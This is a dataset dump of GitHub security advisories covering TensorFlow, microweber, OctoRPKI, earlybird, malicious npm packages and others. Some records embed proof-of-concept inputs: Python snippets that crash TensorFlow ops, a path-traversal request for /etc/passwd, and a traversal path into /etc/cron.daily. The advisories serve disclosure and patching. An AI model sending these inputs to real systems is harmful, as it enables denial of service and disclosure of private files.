ecosystem
stringclasses 14
values | vuln_id
stringlengths 10
19
| summary
stringlengths 4
267
⌀ | details
stringlengths 9
13.5k
| aliases
stringlengths 17
144
⌀ | modified_date
stringdate 2010-05-27 05:47:00
2022-05-10 08:46:52
| published_date
stringdate 2005-12-31 05:00:00
2022-05-10 08:46:50
| severity
stringclasses 5
values | score
float64 0
10
⌀ | cwe_id
stringclasses 988
values | refs
stringlengths 30
17.7k
⌀ | introduced
stringlengths 75
4.26k
⌀ |
|---|---|---|---|---|---|---|---|---|---|---|---|
GHSA
|
GHSA-49rx-x2rw-pc6f
|
Heap OOB read in all `tf.raw_ops.QuantizeAndDequantizeV*` ops
|
### Impact
The [shape inference functions for the `QuantizeAndDequantizeV*` operations](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/array_ops.cc) can trigger a read outside of bounds of heap allocated array as illustrated in the following sets of PoCs:
```python
import tensorflow as tf
@tf.function
def test():
data=tf.raw_ops.QuantizeAndDequantizeV4Grad(
gradients=[1.0,1.0],
input=[1.0,1.0],
input_min=[1.0,10.0],
input_max=[1.0,10.0],
axis=-100)
return data
test()
```
```python
import tensorflow as tf
@tf.function
def test():
data=tf.raw_ops.QuantizeAndDequantizeV4(
input=[1.0,1.0],
input_min=[1.0,10.0],
input_max=[1.0,10.0],
signed_input=False,
num_bits=10,
range_given=False,
round_mode='HALF_TO_EVEN',
narrow_range=False,
axis=-100)
return data
test()
```
```python
import tensorflow as tf
@tf.function
def test():
data=tf.raw_ops.QuantizeAndDequantizeV3(
input=[1.0,1.0],
input_min=[1.0,10.0],
input_max=[1.0,10.0],
signed_input=False,
num_bits=10,
range_given=False,
narrow_range=False,
axis=-100)
return data
test()
```
```python
import tensorflow as tf
@tf.function
def test():
data=tf.raw_ops.QuantizeAndDequantizeV2(
input=[1.0,1.0],
input_min=[1.0,10.0],
input_max=[1.0,10.0],
signed_input=False,
num_bits=10,
range_given=False,
round_mode='HALF_TO_EVEN',
narrow_range=False,
axis=-100)
return data
test()
```
In all of these cases, `axis` is a negative value different than the special value used for optional/unknown dimensions (i.e., -1). However, the code ignores the occurences of these values:
```cc
...
if (axis != -1) {
...
c->Dim(input, axis);
...
}
```
### Patches
We have patched the issue in GitHub commit [7cf73a2274732c9d82af51c2bc2cf90d13cd7e6d](https://github.com/tensorflow/tensorflow/commit/7cf73a2274732c9d82af51c2bc2cf90d13cd7e6d).
The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
|
{'CVE-2021-41205'}
|
2021-11-10T19:04:25Z
|
2021-11-10T19:04:25Z
|
HIGH
| 7.1
|
{'CWE-125'}
|
{'https://github.com/advisories/GHSA-49rx-x2rw-pc6f', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-49rx-x2rw-pc6f', 'https://github.com/tensorflow/tensorflow/commit/7cf73a2274732c9d82af51c2bc2cf90d13cd7e6d', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41205'}
| null |
GHSA
|
GHSA-5xwc-mrhx-5g3m
|
Reference binding to nullptr in `MatrixDiagV*` ops
|
### Impact
An attacker can cause undefined behavior via binding a reference to null pointer in all operations of type `tf.raw_ops.MatrixDiagV*`:
```python
import tensorflow as tf
tf.raw_ops.MatrixDiagV3(
diagonal=[1,0],
k=[],
num_rows=[1,2,3],
num_cols=[4,5],
padding_value=[],
align='RIGHT_RIGHT')
```
The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/linalg/matrix_diag_op.cc) has incomplete validation that the value of `k` is a valid tensor. We have check that this value is either a scalar or a vector, but there is no check for the number of elements. If this is an empty tensor, then code that accesses the first element of the tensor is wrong:
```cc
auto& diag_index = context->input(1);
...
lower_diag_index = diag_index.flat<int32>()(0);
```
### Patches
We have patched the issue in GitHub commit [f2a673bd34f0d64b8e40a551ac78989d16daad09](https://github.com/tensorflow/tensorflow/commit/f2a673bd34f0d64b8e40a551ac78989d16daad09).
The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
|
{'CVE-2021-37657'}
|
2021-08-25T14:42:52Z
|
2021-08-25T14:42:52Z
|
HIGH
| 7.1
|
{'CWE-824'}
|
{'https://github.com/advisories/GHSA-5xwc-mrhx-5g3m', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37657', 'https://github.com/tensorflow/tensorflow/commit/f2a673bd34f0d64b8e40a551ac78989d16daad09', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5xwc-mrhx-5g3m'}
| null |
GHSA
|
GHSA-p7w9-8mxw-p3g7
|
Improper Certificate Validation in Hutool
|
Hutool v5.7.18's HttpRequest was discovered to ignore all TLS/SSL certificate validation.
|
{'CVE-2022-22885'}
|
2022-03-01T18:36:45Z
|
2022-02-17T00:00:26Z
|
CRITICAL
| 9.8
|
{'CWE-295'}
|
{'https://github.com/advisories/GHSA-p7w9-8mxw-p3g7', 'https://nvd.nist.gov/vuln/detail/CVE-2022-22885', 'https://github.com/dromara/hutool/issues/2042', 'https://apidoc.gitee.com/dromara/hutool/cn/hutool/http/ssl/DefaultSSLInfo.html'}
| null |
GHSA
|
GHSA-hrf4-hcpc-3345
|
Denial of service in microweber
|
Microweber is drag and drop website builder and CMS with E-commerce. The microweber prior 1.2.12 application allows large characters to insert in the input field "post title" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. The post title input can be limited to 500 characters or max 1000 characters as a workaround.
|
{'CVE-2022-0961'}
|
2022-03-25T17:09:25Z
|
2022-03-16T00:00:48Z
|
HIGH
| 7.1
|
{'CWE-190'}
|
{'https://github.com/microweber/microweber/commit/f7acbd075dff4825b35b597b74958de9edce67fc', 'https://github.com/advisories/GHSA-hrf4-hcpc-3345', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0961', 'https://huntr.dev/bounties/cdf00e14-38a7-4b6b-9bb4-3a71bf24e436'}
| null |
GHSA
|
GHSA-84px-q68r-2fc9
|
Privilege escalation in the Sulu Admin panel
|
### Impact
Impacted are only users which already have access to the admin UI. Over the API it was possible for them to give themselves permissions to areas which they did not already had. This issue was introduced in 2.0.0-RC1 with the new ProfileController putAction.
### Patches
The versions have been patched in 2.2.18, 2.3.8 and 2.4.0.
### Workarounds
Patching the ProfileController of affected sulu versions yourself by overwriting it.
### References
_Are there any links users can visit to find out more?_
Currently not.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [sulu/sulu repo](https://github.com/sulu/sulu/issues)
* Email us at [security@sulu.io](mailto:security@sulu.io)
|
{'CVE-2021-43835'}
|
2021-12-16T14:08:57Z
|
2021-12-15T22:55:16Z
|
HIGH
| 7.2
|
{'CWE-269'}
|
{'https://github.com/sulu/sulu/security/advisories/GHSA-84px-q68r-2fc9', 'https://github.com/advisories/GHSA-84px-q68r-2fc9', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43835', 'https://github.com/sulu/sulu/commit/30bf8b5a4f83b6f2171a696011757d095edaa28a'}
| null |
GHSA
|
GHSA-5684-g483-2249
|
Signature Validation Bypass
|
### Impact
Given a valid SAML Response, an attacker can potentially modify the document, bypassing signature validation in order to pass off the altered document as a signed one.
This enables a variety of attacks, including users accessing accounts other than the one to which they authenticated in the identity provider, or full authentication bypass if an external attacker can obtain an expired, signed SAML Response.
### Patches
A patch is available, users of gosaml2 should upgrade to v0.5.0 or higher.
### References
See the [underlying advisory on goxmldsig](https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-q547-gmf8-8jr7) for more details.
| null |
2022-04-19T19:02:35Z
|
2021-05-24T16:59:47Z
|
CRITICAL
| 0
|
{'CWE-347'}
|
{'https://github.com/advisories/GHSA-5684-g483-2249', 'https://github.com/russellhaering/gosaml2/security/advisories/GHSA-5684-g483-2249'}
| null |
GHSA
|
GHSA-97pv-4338-r5vp
|
Cross-site Scripting in file-upload-with-preview
|
This affects the package file-upload-with-preview before 4.2.0. A file containing malicious JavaScript code in the name can be uploaded (a user needs to be tricked into uploading such a file).
|
{'CVE-2021-23439'}
|
2021-09-07T23:08:54Z
|
2021-09-07T23:08:54Z
|
MODERATE
| 4.2
|
{'CWE-79'}
|
{'https://github.com/johndatserakis/file-upload-with-preview/pull/40/files?file-filters%5B%5D=.js&hide-deleted-files=true%23diff-fe47b243de17419c0daa22cd785cd754baed60cf3679d3da1d6fe006f9f4a7f0R174', 'https://github.com/johndatserakis/file-upload-with-preview/blob/develop/src/file-upload-with-preview.js%23L168', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23439', 'https://snyk.io/vuln/SNYK-JS-FILEUPLOADWITHPREVIEW-1579492', 'https://github.com/advisories/GHSA-97pv-4338-r5vp'}
| null |
GHSA
|
GHSA-cqh2-vc2f-q4fh
|
Arbitrary filepath traversal via URI injection
|
OctoRPKI does not escape a URI with a filename containing "..", this allows a repository to create a file, (ex. `rsync://example.org/repo/../../etc/cron.daily/evil.roa`), which would then be written to disk outside the base cache folder. This could allow for remote code execution on the host machine OctoRPKI is running on.
## Patches
## For more information
If you have any questions or comments about this advisory email us at security@cloudflare.com
|
{'CVE-2021-3907'}
|
2022-01-13T18:25:56Z
|
2021-11-10T20:08:29Z
|
HIGH
| 7.4
|
{'CWE-20', 'CWE-22'}
|
{'https://github.com/advisories/GHSA-cqh2-vc2f-q4fh', 'https://www.debian.org/security/2022/dsa-5041', 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-cqh2-vc2f-q4fh', 'https://www.debian.org/security/2021/dsa-5033', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3907'}
| null |
GHSA
|
GHSA-mj4x-wcxf-hm8x
|
Json-jwt (RubyGems) did not verify, or incorrectly verifies, the cryptographic signature for data
|
The json-jwt rubygem version >= 0.5.0 && < 1.9.4 contains a CWE-347: Improper Verification of Cryptographic Signature vulnerability in Decryption of AES-GCM encrypted JSON Web Tokens that can result in Attacker can forge a authentication tag. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in 1.9.4 and later.
|
{'CVE-2018-1000539'}
|
2022-04-26T18:20:02Z
|
2018-07-31T18:13:51Z
|
MODERATE
| 5.3
|
{'CWE-347'}
|
{'https://github.com/nov/json-jwt/pull/62', 'https://www.debian.org/security/2018/dsa-4283', 'https://github.com/advisories/GHSA-mj4x-wcxf-hm8x', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000539'}
| null |
GHSA
|
GHSA-qpwf-4fx5-crqq
|
Directory Traversal in earlybird
|
Affected versions of `earlybird` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16154'}
|
2021-01-14T15:50:11Z
|
2020-09-01T17:19:36Z
|
HIGH
| 0
|
{'CWE-22'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16154', 'https://github.com/advisories/GHSA-qpwf-4fx5-crqq', 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/earlybird', 'https://nodesecurity.io/advisories/380', 'https://www.npmjs.com/advisories/380'}
| null |
GHSA
|
GHSA-w3f3-4j22-2v3p
|
Malicious Package in destroyer-of-worlds
|
The package `destroyer-of-worlds` contained malicious code. The package contained a bash script that was run as a postinstall script. The script deleted system files and attempted to exhaust resources by creating a large file, a fork bomb and an endless loop. The script targeted UNIX systems.
## Recommendation
Remove the package from your environment and perform additional incident response on your system's files and processes.
| null |
2021-09-30T21:25:21Z
|
2020-09-02T21:27:02Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/890', 'https://github.com/advisories/GHSA-w3f3-4j22-2v3p'}
| null |
GHSA
|
GHSA-3944-787c-f852
|
Persistent Cross-Site scripting in Nexus Repository Manager
|
Sonatype Nexus Repository before 3.21.2 allows XSS.
|
{'CVE-2020-10203'}
|
2021-08-23T15:11:56Z
|
2020-04-14T15:27:21Z
|
MODERATE
| 4.8
|
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-3944-787c-f852', 'https://support.sonatype.com/hc/en-us/articles/360044361594', 'https://nvd.nist.gov/vuln/detail/CVE-2020-10203', 'https://securitylab.github.com/advisories/GHSL-2020-016-nxrm-sonatype'}
| null |
GHSA
|
GHSA-vw2g-5827-m9fp
|
Out-of-bounds write
|
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1307, CVE-2019-1335, CVE-2019-1366.
|
{'CVE-2019-1308'}
|
2021-03-29T20:55:52Z
|
2021-03-29T20:55:52Z
|
HIGH
| 7.5
|
{'CWE-787'}
|
{'https://github.com/chakra-core/ChakraCore/commit/64376deca69126c2bb05cd87bd5c073aedaf5f9c', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1308', 'https://github.com/chakra-core/ChakraCore/commit/cc871514deeaeaedb5b757c2ca8cd4ab9abccb5d', 'https://github.com/advisories/GHSA-vw2g-5827-m9fp', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1308'}
| null |
GHSA
|
GHSA-vc29-rj92-gc7j
|
Out-of-bounds Write in OpenCV
|
OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python and OpenCV-Contrib-Python 3.3.0.9) has an out-of-bounds write error in the function FillColorRow4 in utils.cpp when reading an image file by using cv::imread.
|
{'CVE-2017-12606'}
|
2021-11-18T15:33:38Z
|
2021-10-12T22:02:12Z
|
HIGH
| 8.8
|
{'CWE-787'}
|
{'https://github.com/advisories/GHSA-vc29-rj92-gc7j', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12606', 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html', 'https://github.com/opencv/opencv/pull/9376', 'https://security.gentoo.org/glsa/201712-02', 'https://github.com/opencv/opencv/issues/9309', 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html', 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}
| null |
GHSA
|
GHSA-2h3x-95c6-885r
|
Malicious Package in river-mock
|
All versions of `river-mock` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-09-30T20:01:19Z
|
2020-09-03T17:46:46Z
|
CRITICAL
| 9.8
|
{'CWE-506'}
|
{'https://github.com/advisories/GHSA-2h3x-95c6-885r', 'https://www.npmjs.com/advisories/1062'}
| null |
GHSA
|
GHSA-3269-x4pw-vffg
|
OS Command Injection in diskusage-ng
|
diskusage-ng through 0.2.4 is vulnerable to Command Injection.It allows execution of arbitrary commands via the path argument.
|
{'CVE-2020-7631'}
|
2022-01-07T00:21:08Z
|
2022-01-07T00:21:08Z
|
CRITICAL
| 9.8
|
{'CWE-78'}
|
{'https://github.com/iximiuz/node-diskusage-ng/blob/master/lib/posix.js#L11', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7631', 'https://snyk.io/vuln/SNYK-JS-DISKUSAGENG-564425', 'https://github.com/advisories/GHSA-3269-x4pw-vffg'}
| null |
GHSA
|
GHSA-68vr-8f46-vc9f
|
Username spoofing in OnionShare
|
Between September 26, 2021 and October 8, 2021, [Radically Open Security](https://www.radicallyopensecurity.com/) conducted a penetration test of OnionShare 2.4, funded by the Open Technology Fund's [Red Team lab](https://www.opentech.fund/labs/red-team-lab/). This is an issue from that penetration test.
- Vulnerability ID: OTF-005
- Vulnerability type: Improper Input Sanitization
- Threat level: Low
## Description:
It is possible to change the username to that of another chat participant with an additional space character at the end of the name string.
## Technical description:
Assumed users in Chat:
- Alice
- Bob
- Mallory
1. Mallory renames to `Alice `.
2. Mallory sends message as `Alice `.
3. Alice and Bob receive a message from Mallory disguised as `Alice `, which is hard to distinguish from the `Alice`
in the web interface.


Other (invisible) whitespace characters were found to be working as well.
## Impact:
An adversary with access to the chat environment can use the rename feature to impersonate other participants by adding whitespace characters at the end of the username.
## Recommendation:
- Remove non-visible characters from the username
|
{'CVE-2022-21696'}
|
2022-01-21T23:20:14Z
|
2022-01-21T23:20:14Z
|
MODERATE
| 4.3
|
{'CWE-20'}
|
{'https://github.com/onionshare/onionshare/security/advisories/GHSA-68vr-8f46-vc9f', 'https://github.com/onionshare/onionshare/releases/tag/v2.5', 'https://github.com/advisories/GHSA-68vr-8f46-vc9f', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21696'}
| null |
GHSA
|
GHSA-vcr5-xr9h-mvc5
|
Moderate severity vulnerability that affects python-gnupg
|
python-gnupg 0.3.5 and 0.3.6 allows context-dependent attackers to have an unspecified impact via vectors related to "option injection through positional arguments." NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-7323.
|
{'CVE-2014-1929'}
|
2021-09-20T21:42:12Z
|
2018-11-06T23:12:48Z
|
MODERATE
| 0
|
{'CWE-20'}
|
{'http://seclists.org/oss-sec/2014/q1/245', 'https://github.com/advisories/GHSA-vcr5-xr9h-mvc5', 'https://nvd.nist.gov/vuln/detail/CVE-2014-1929', 'http://seclists.org/oss-sec/2014/q1/335', 'http://www.debian.org/security/2014/dsa-2946', 'http://secunia.com/advisories/59031'}
| null |
GHSA
|
GHSA-2ggq-vfcp-gwhj
|
Cross-Site Scripting in @hapi/boom
|
Versions of `@hapi/boom` prior t 0.3.8 are vulnerable to Cross-Site Scripting (XSS). The package fails to properly escape error messages, which may allow attackers to execute arbitrary JavaScript in a victim's browser.
## Recommendation
Upgrade to version 0.3.8 or later.
| null |
2021-10-04T20:48:51Z
|
2020-09-04T17:33:53Z
|
MODERATE
| 6.5
|
{'CWE-79'}
|
{'https://snyk.io/vuln/SNYK-JS-HAPIBOOM-541183', 'https://www.npmjs.com/advisories/1459', 'https://github.com/advisories/GHSA-2ggq-vfcp-gwhj', 'https://github.com/hapijs/boom'}
| null |
GHSA
|
GHSA-6m53-c78q-7qmg
|
Mitmweb in mitmproxy allows DNS Rebinding attacks
|
mitmweb in mitmproxy before v4.0.4 allows DNS Rebinding attacks, related to tools/web/app.py.
|
{'CVE-2018-14505'}
|
2022-04-26T18:21:25Z
|
2018-07-31T18:18:19Z
|
HIGH
| 8.8
|
{'CWE-20'}
|
{'https://github.com/advisories/GHSA-6m53-c78q-7qmg', 'https://github.com/mitmproxy/mitmproxy/issues/3234', 'https://github.com/mitmproxy/mitmproxy/pull/3243', 'https://nvd.nist.gov/vuln/detail/CVE-2018-14505'}
| null |
GHSA
|
GHSA-5q88-cjfq-g2mh
|
codecov NPM module allows remote attackers to execute arbitrary commands
|
codecov-node npm module before 3.6.5 allows remote attackers to execute arbitrary commands.The value provided as part of the gcov-root argument is executed by the exec function within lib/codecov.js. This vulnerability exists due to an incomplete fix of CVE-2020-7596.
|
{'CVE-2020-7597'}
|
2021-08-19T17:22:07Z
|
2020-02-19T17:29:39Z
|
HIGH
| 8.8
|
{'CWE-78'}
|
{'https://snyk.io/vuln/SNYK-JS-CODECOV-548879', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7597', 'https://github.com/advisories/GHSA-5q88-cjfq-g2mh', 'https://github.com/codecov/codecov-node/commit/02cf13d8b93ac547b5b4c2cfe186b7d874fd234f'}
| null |
GHSA
|
GHSA-9qvw-46gf-4fv8
|
Use After Free in tremor-script
|
An issue was discovered in the tremor-script crate before 0.11.6 for Rust. A merge operation may result in a use-after-free.
|
{'CVE-2021-45702'}
|
2022-01-07T17:41:13Z
|
2022-01-06T22:09:07Z
|
HIGH
| 7.5
|
{'CWE-416'}
|
{'https://rustsec.org/advisories/RUSTSEC-2021-0111.html', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/tremor-script/RUSTSEC-2021-0111.md', 'https://github.com/advisories/GHSA-9qvw-46gf-4fv8', 'https://nvd.nist.gov/vuln/detail/CVE-2021-45702'}
| null |
GHSA
|
GHSA-75c5-f4gw-38r9
|
Multiple vulnerabilities through filename manipulation in Archive_Tar
|
Archive_Tar through 1.4.10 has :// filename sanitization only to address phar attacks, and thus any other stream-wrapper attack (such as file:// to overwrite files) can still succeed. See: https://github.com/pear/Archive_Tar/issues/33
|
{'CVE-2020-28949'}
|
2021-09-27T18:45:51Z
|
2021-04-22T16:20:59Z
|
HIGH
| 7.8
|
{'CWE-74'}
|
{'https://lists.debian.org/debian-lts-announce/2020/11/msg00045.html', 'https://github.com/FriendsOfPHP/security-advisories/blob/master/pear/archive_tar/CVE-2020-28949.yaml', 'https://www.debian.org/security/2020/dsa-4817', 'https://github.com/pear/Archive_Tar/issues/33', 'http://packetstormsecurity.com/files/161095/PEAR-Archive_Tar-Arbitrary-File-Write.html', 'https://security.gentoo.org/glsa/202101-23', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NBYZSHYTIOBK6V7C4N7TP6KIKCRKLVWP/', 'https://www.drupal.org/sa-core-2020-013', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VJQQYDAOWHD6RDITDRPHFW7WY6BS3V5N/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KWM4CTMEGAC4I2CHYNJVSROY4CVXVEUT/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4V35LBRM6HBCXBVCITKQ4UEBTXO2EG7B/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42GPGVVFTLJYAKRI75IVB5R45NYQGEUR/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5KSFM672XW3X6BR7TVKRD63SLZGKK437/', 'https://github.com/pear/Archive_Tar/commit/0670a05fdab997036a3fc3ef113b8f5922e574da', 'https://github.com/advisories/GHSA-75c5-f4gw-38r9', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28949'}
| null |
GHSA
|
GHSA-vcgf-vmpc-ph79
|
Improper Access Control in microweber
|
Improper Access Control in Packagist microweber/microweber prior to 1.2.11.
|
{'CVE-2022-0277'}
|
2022-01-27T18:30:42Z
|
2022-01-21T18:06:16Z
|
MODERATE
| 6.5
|
{'CWE-284', 'CWE-269'}
|
{'https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6', 'https://huntr.dev/bounties/0e776f3d-35b1-4a9e-8fe8-91e46c0d6316', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0277', 'https://github.com/advisories/GHSA-vcgf-vmpc-ph79'}
| null |
GHSA
|
GHSA-wg37-7mrv-cfwm
|
Low severity vulnerability that affects org.apache.jmeter:ApacheJMeter
|
Unauthenticated RCE is possible when JMeter is used in distributed mode (-r or -R command line options). Attacker can establish a RMI connection to a jmeter-server using RemoteJMeterEngine and proceed with an attack using untrusted data deserialization. This only affect tests running in Distributed mode. Note that versions before 4.0 are not able to encrypt traffic between the nodes, nor authenticate the participating nodes so upgrade to JMeter 5.1 is also advised.
|
{'CVE-2019-0187'}
|
2021-09-21T19:37:42Z
|
2019-03-07T18:47:57Z
|
CRITICAL
| 9.8
|
{'CWE-327', 'CWE-502'}
|
{'https://github.com/advisories/GHSA-wg37-7mrv-cfwm', 'http://mail-archives.apache.org/mod_mbox/jmeter-user/201903.mbox/%3CCAH9fUpaUQaFbgY1Zh4OvKSL4wdvGAmVt%2Bn4fegibDoAxK5XARw%40mail.gmail.com%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0187', 'http://www.securityfocus.com/bid/107219'}
| null |
GHSA
|
GHSA-2cjf-w7c4-fhf6
|
Cross-site Scripting in Beanstalk console
|
Beanstalk console (ptrofimov/beanstalk_console) prior to 1.7.14 is vulnerable to cross-site scripting.
|
{'CVE-2022-0539'}
|
2022-02-11T21:08:35Z
|
2022-02-10T00:00:30Z
|
MODERATE
| 6.3
|
{'CWE-79'}
|
{'https://github.com/ptrofimov/beanstalk_console/commit/5aea5f912f6e6d19dedb1fdfc25a29a2e1fc1694', 'https://huntr.dev/bounties/5f41b182-dda2-4c6f-9668-2a9afaed53af', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0539', 'https://github.com/advisories/GHSA-2cjf-w7c4-fhf6'}
| null |
GHSA
|
GHSA-gh8h-7j2j-qv4f
|
Incomplete validation in `tf.summary.create_file_writer`
|
### Impact
If `tf.summary.create_file_writer` is called with non-scalar arguments code crashes due to a `CHECK`-fail.
```python
import tensorflow as tf
import numpy as np
tf.summary.create_file_writer(logdir='', flush_millis=np.ones((1,2)))
```
### Patches
We have patched the issue in GitHub commit [874bda09e6702cd50bac90b453b50bcc65b2769e](https://github.com/tensorflow/tensorflow/commit/874bda09e6702cd50bac90b453b50bcc65b2769e) (merging [#51715](https://github.com/tensorflow/tensorflow/pull/51715)).
The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46909).
|
{'CVE-2021-41200'}
|
2021-11-10T19:31:16Z
|
2021-11-10T19:31:16Z
|
MODERATE
| 5.5
|
{'CWE-617'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-41200', 'https://github.com/advisories/GHSA-gh8h-7j2j-qv4f', 'https://github.com/tensorflow/tensorflow/issues/46909', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gh8h-7j2j-qv4f', 'https://github.com/tensorflow/tensorflow/commit/874bda09e6702cd50bac90b453b50bcc65b2769e'}
| null |
GHSA
|
GHSA-98mf-8f57-64qf
|
Moderate severity vulnerability that affects actionpack
|
Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/form_tag_helper.rb in Ruby on Rails 3.x before 3.0.17, 3.1.x before 3.1.8, and 3.2.x before 3.2.8 allows remote attackers to inject arbitrary web script or HTML via the prompt field to the select_tag helper.
|
{'CVE-2012-3463'}
|
2021-09-07T21:12:11Z
|
2017-10-24T18:33:37Z
|
MODERATE
| 0
|
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-98mf-8f57-64qf', 'http://weblog.rubyonrails.org/2012/8/9/ann-rails-3-2-8-has-been-released/', 'https://groups.google.com/group/rubyonrails-security/msg/961e18e514527078?dmode=source&output=gplain', 'http://rhn.redhat.com/errata/RHSA-2013-0154.html', 'https://nvd.nist.gov/vuln/detail/CVE-2012-3463'}
| null |
GHSA
|
GHSA-g753-jx37-7xwh
|
ECDSA signature vulnerability of Minerva timing attack in jsrsasign
|
### Impact
ECDSA side-channel attack named [Minerava](https://minerva.crocs.fi.muni.cz/) have been found and it was found that it affects to jsrsasign.
Execution time of thousands signature generation have been observed then EC private key which is scalar value may be recovered since point and scalar multiplication time depends on bits of scalar. In jsrsasign 8.0.13 or later, execution time of EC point and scalar multiplication is almost constant and fixed for the issue.
- Minerva is one of timing attack or side channel attack for EC.
- If you don't use ECDSA class, you are not affected the vulnerability.
- The vulnerability is that attacker may guess private key by checking processing time of EC key generation or ECDSA signing.
- The cause issue is that point multiplication processing time in ECDSA signing is depends on private key value.
- After 8.0.13, processing time of point multiplication in ECDSA signing have become constant for key value in theory.
### Patches
Users using ECDSA signature generation should upgrade to 8.0.13 or later.
### Workarounds
There is no workarounds in jsrsasign. Update jsrsasign or use other ECDSA library.
### ACKNOWLEDGEMENT
Thanks to Jan Jancar @J08nY, Petr Svenda and Vladimir Sedlacek of Masaryk University in Czech Republic to find and report this vulnerability.
### References
https://minerva.crocs.fi.muni.cz/
https://www.npmjs.com/advisories/1505
https://github.com/kjur/jsrsasign/issues/411
| null |
2021-09-22T18:43:42Z
|
2020-06-30T16:05:08Z
|
MODERATE
| 5.9
|
{'CWE-362'}
|
{'https://snyk.io/vuln/SNYK-JS-JSRSASIGN-561755', 'https://github.com/kjur/jsrsasign/releases/tag/8.0.13', 'https://github.com/kjur/jsrsasign/issues/411', 'https://github.com/kjur/jsrsasign/commit/9dcb89c57408a3d4b5b66aa9138426bd92819e73', 'https://github.com/kjur/jsrsasign/security/advisories/GHSA-g753-jx37-7xwh', 'https://github.com/advisories/GHSA-g753-jx37-7xwh', 'https://minerva.crocs.fi.muni.cz/', 'https://www.npmjs.com/advisories/1505'}
| null |
GHSA
|
GHSA-x3rq-r3cm-5vc4
|
Business Logic Errors in Publify
|
Publify (formerly known as Typo) prior to version 9.2.7 is vulnerable to business logic errors.
|
{'CVE-2022-0524'}
|
2022-02-14T22:34:47Z
|
2022-02-09T00:00:27Z
|
HIGH
| 7.5
| null |
